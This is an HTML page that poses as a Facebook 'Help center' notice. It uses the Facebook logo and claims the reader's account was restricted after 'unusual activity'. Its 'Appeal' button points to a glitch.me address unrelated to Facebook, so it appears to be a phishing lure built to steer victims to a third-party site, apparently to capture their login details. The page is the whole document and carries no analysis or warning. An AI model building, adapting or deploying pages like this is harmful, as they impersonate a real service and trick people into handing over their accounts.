


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Review Appeal</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f2f2f2; /* Set your desired background color */
        }

        .container {
            text-align: center;
            margin-top: 50px;
        }

        .title {
            font-size: 24px;
            font-weight: bold;
        }

        .image-container {
            margin-bottom: 20px;
        }

        .review-text {
            font-weight: bold;
        }

        .appeal-button {
            padding: 10px 20px;
            font-size: 16px;
            font-weight: bold;
            color: #ffffff;
            background-color: #1877f2; /* Facebook blue color */
            border: none;
            border-radius: 5px;
            cursor: pointer;
            text-decoration: none; /* Remove default underline for anchor elements */
        }

        .appeal-button:hover {
            background-color: #0e5aaf; /* Darker blue on hover */
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="image-container">
            <img src="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png" alt="Action Required Image" width="100" height="100">
        </div>
        <p class="title">Help center</p>
        <p class="review-text">We Have detetcted an unusual activity and restricted your account, you can click on appeal for review</p>
      <br>
        <a href="https://review-new--remove-violation.glitch.me" class="appeal-button">Appeal</a>
    </div>
</body>
</html>